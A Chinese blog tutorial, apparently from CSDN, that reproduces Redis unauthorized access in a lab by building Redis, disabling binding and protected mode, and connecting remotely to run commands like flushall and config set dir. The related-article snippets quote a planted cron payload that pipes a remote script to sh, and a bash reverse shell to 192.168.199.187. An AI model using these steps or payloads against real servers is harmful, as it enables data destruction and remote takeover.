Redis安全攻防(一)未授权访问复现

最新推荐文章于 2022-07-29 10:20:41 发布
最新推荐文章于 2022-07-29 10:20:41 发布
阅读量284 收藏 1
点赞数
分类专栏: WEB安全 文章标签: redis 数据库 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54430466/article/details/115297454
版权
本文详细介绍了如何利用未授权访问漏洞对Redis进行渗透测试,包括Redis的安装、配置修改,以及各种命令的使用,如info、flushall、flushdb等。此外,还提供了Redis安全攻防系列文章的链接,帮助读者深入理解Redis的安全风险和防范措施。
摘要由CSDN通过智能技术生成

文章目录


在渗透目标中遇到好几次,记录下方便学习,以后攻击利用。
靶机情况:
攻击机:192.168.199.187 / osx /redis4.0
目标机:192.168.199.136 / centos 7 /redis5.0

1.未授权漏洞访问

1.1 wget 获取redis5.0(攻击机和靶机都需要redis环境)

wget download.redis.io/releases/redis-5.0.0.tar.gz
在这里插入图片描述
1.2 解压
在这里插入图片描述
1.3 编译

Make编译,有的系统可能报错。是因为缺少GNU编译器套件(gcc)因为Redis使用c编写,所以需要gcc.
执行命令安装gcc
在这里插入图片描述
再次make
发生错误原因可能是有残留文件,清理再次make
在这里插入图片描述
可以执行以下命令
在这里插入图片描述
编译安装ok.

1.4 简单配置

进入redis下src目录,复制redis-server/redis-cli到/usr/bin下方便启动
在这里插入图片描述

编辑redis目录下redis.conf
取消本地绑定ip
在这里插入图片描述
切换本地保护模式为no
在这里插入图片描述
允许任意ip连接登录
在这里插入图片描述
开启端口
在这里插入图片描述
1.5 攻击机也需要安装redis,利用客户端命令redis-cli -h 靶机ip
在这里插入图片描述
未授权访问成功,info查看靶机信息
在这里插入图片描述

2.其他命令

查看信息 info

删除所有数据库内容:flushall

刷新数据库: flushdb

可以查看键值数据:select num

设置变量:set test "who am i"

config set dir dirpath 设置路径等配置

config get dir/dbfilename 获取路径及数据配置信息

save保存

get 变量,查看变量名称

3.系列文章地址

Redis安全攻防(一)未授权访问复现
Redis安全攻防(二)Redis通过备份功能实现的三种攻击方法
Redis安全攻防(三)设置密码认证

网络安全练习生
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Redis授权访问漏洞复现
xunhuanmao的博客
09-22 2224
Redis授权访问漏洞的环境搭建以及利用方式。
Redis被攻击(Redis安全性)
Beyonderwei的博客
10-28 2146
文章目录一、简介二、设置密码 一、简介     默认Redis没有开启密码,因此需要我们进入后设置。如果没有设置密码就很容易会被攻击到,导致数据丢失,被植入其他内容。被攻击后写入了一些其他内容如下: 查询一下某一个键的内容为如下形式:(不是很懂,应该被植入了一些脚本文件) "\t\n*/20 * * * * curl -fsSL http://d.powerofwish.com/pm.sh | sh\n\t" 二、设置密码 常用命令: config get requirepass # 查询获
Redis 授权访问漏洞
Unitue_逆流
10-14 724
转自:https://www.ichunqiu.com/vm/59321/1 实验需了解: Redis是一个高性能的key-value数据库 Redis暴露在公网(即绑定在0.0.0.0:6379,目标IP公网可访问),并且在没有开启相关认证和添加相关安全策略的情况下可以导致任意用户在访问目标服务器时授权访问Redis以及读取Redis的数据。利用Redis自身的相关方法,可以进行写文件操作
redis授权访问复现
m0_46580995的博客
07-16 208
redis授权访问
redis授权访问漏洞复现
findou
04-09 437
Redis是一个开源的key-value内存中的数据结构存储系统,可以用作缓存,或数据库redis因为配置不当可以导致授权访问redis的默认端口是6379,并且redis默认配置没有密码认证,如果reids服务暴露在公网上会导致攻击者在授权的情况下访问redis。如果redis以root身份运行,攻击者可以给root账号写入ssh公钥文件,通过ssh登录目标主机。下面是redis授权访...
Redis授权访问配合SSH key文件利用详解
09-09
本文将详细讨论一个常见的安全问题:Redis授权访问配合SSH key文件利用。 Redis默认监听在`0.0.0.0:6379`,这意味着它对所有网络接口开放,如果不加以限制,任何能够访问到服务器的人都可以尝试连接Redis。特别是...
关于Redis授权访问漏洞利用的介绍与修复建议
01-21
本文主要给大家介绍了关于Redis授权访问漏洞利用的相关内容,文中对该漏洞进行了详细,并给出了相对应的修复/安全建议,下面话不多说了,来一起看看详细的介绍吧。 一、漏洞介绍 Redis 默认情况下,会绑定在 0.0....
Redis授权访问漏洞利用总结
热门推荐
Fly_鹏程万里
07-06 2万+
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flusha...
redis安全防护
weixin_44953227的博客
07-29 1200
构建一个地址,比如说是删除某个博客网站博客的链接,然后诱使已经登录过该网站的用户点击恶意链接,可能会导致用户通过自己的手将曾经发布在该网站的博客在不知情的情况下删除了。这种构建恶意链接,假借受害者的手造成损失的攻击方式就叫CSRF-跨站点请求伪造验证“Referer”头的值,并对每个提交的表单使用one-time-nonce1.工作台、前端模块配置及后端模块的application.properties文件里面的接口地址需要统一使用后端API接口的代理地址,保证API接口的IP和端口一样;......
Redis授权访问漏洞报告
ZYH_boss的博客
10-09 352
环境使用:kali、vulhub、burp suite(bp) 开始:打开vulhub,打开终端,进入root ifconfig查看ip地址 找到ip 为192.168.147.139 查看端口开放情况,7001开放 浏览器打开192.168.147.139:7001,发现404报错,是客户端错误,说明服务端开启的,只是访问失败 在后面加上/uddiexplorer/SearchPu...
[红日安全]Web安全Day7 - 越权/非授权访问实战攻防
hongrisec的博客
03-02 1515
本文由红日安全成员: misakikata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
Redis安全攻防(二)Redis通过备份功能实现的三种攻击方法
慢就是快
03-29 462
0x01 利用redis备份写定时任务反弹shell 原理:利用redis备份功能进行文件操作 开始前可以做个备份,实际攻击中最好先执行config get dir 记清楚原来备份路径,方便还原擦除痕迹 利用redis-cli -h 目标ip 连接redis服务器 执行以下命令: set x "\n* * * * * bash -i >& /dev/tcp/192.168.199.187/7999 0>&1\n" //设置变量x,引号里为变量内容,这也备份的时候可以把
Redis授权访问漏洞复现(www.hetianlab.com)
懂进攻知防守
07-19 1133
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面配置不当导致其他用户可以无需认证授权直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
redis安全攻防
qq_42307546的博客
09-06 164
Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSIC语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。 00x1 readis安装和使用 (5条消息) linux安装部署redis,linuxredis安装部署_谢平凡的博客-CSDN博客 (5条消息) redis设置允.
redis数据库授权访问-SSRF
千寻的博客
02-09 1084
文章目录第一步 :获取镜像第二步 启动docker镜像第三步:登录docker镜像第四步:访问weblogic(7001端口)第五步:存在SSRF 漏洞抓到的数据包进行内网的探测补充:redis 数据库第六步 通过读写计划任务文件crontab反弹Shell 到指定地址url编码burp里面提交第七步 第六步的同时设置监听 第一步 :获取镜像 [cd Desktop/] [cd vulhub-ma...
Redis授权访问漏洞
最新发布
05-31
Redis是一款流行的内存数据库,但是在使用时需要注意到安全问题,其中一个比较常见的问题就是Redis授权访问漏洞。该漏洞会导致攻击者可以直接访问Redis服务器,获取其中的数据、修改数据或者直接删除数据,给应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值